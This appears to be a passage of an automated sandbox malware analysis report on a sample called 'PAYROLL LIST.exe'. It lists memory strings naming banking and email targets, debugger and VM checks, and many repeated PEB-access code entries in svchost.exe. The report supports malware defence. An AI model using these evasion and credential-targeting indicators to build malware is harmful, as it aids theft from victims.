Source: FxK39HI69.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: FxK39HI69.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: XQNtOWkQlf.exe, 00000007.00000002.4577752630.000000000118F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: FxK39HI69.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: FxK39HI69.5.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: FxK39HI69.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: FxK39HI69.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: FxK39HI69.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: FxK39HI69.5.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: FxK39HI69.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: FxK39HI69.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: FxK39HI69.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: FxK39HI69.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: FxK39HI69.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0337096E rdtsc

2_2_0337096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00418073 LdrLoadDll,

2_2_00418073

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A76AAF BlockInput,

0_2_00A76AAF

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A23D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00A23D19

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A53920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00A53920

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A3E01E LoadLibraryA,GetProcAddress,

0_2_00A3E01E

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00BAA080 mov eax, dword ptr fs:[00000030h]	0_2_00BAA080
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00BAA0E0 mov eax, dword ptr fs:[00000030h]	0_2_00BAA0E0
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00BA8A30 mov eax, dword ptr fs:[00000030h]	0_2_00BA8A30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]	2_2_0332C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]	2_2_03350310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]	2_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]	2_2_033D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]	2_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]	2_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h]	2_2_033D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]	2_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]	2_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]	2_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]	2_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]	2_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]	2_2_033663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]	2_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]	2_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]	2_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]	2_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]	2_2_033EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]	2_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h]	2_2_033B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]	2_2_0332823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]	2_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]	2_2_0332826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]	2_2_0332A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]	2_2_03336259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]	2_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]	2_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]	2_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]	2_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]	2_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]	2_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]	2_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]	2_2_03360124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]	2_2_033F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]	2_2_0332C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]	2_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]	2_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]	2_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]	2_2_034061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]	2_2_03370185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]	2_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]	2_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]	2_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]	2_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]	2_2_033601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]	2_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]	2_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]	2_2_033C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]	2_2_0332A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]	2_2_0332C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]	2_2_033B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]	2_2_0335C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]	2_2_03332050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]	2_2_033B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]	2_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]	2_2_033C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]	2_2_0333208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0332C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]	2_2_033720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0332A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]	2_2_033380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]	2_2_033B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]	2_2_033B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]	2_2_033AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]	2_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]	2_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]	2_2_03330710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]	2_2_03360710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]	2_2_0336C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]	2_2_03338770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
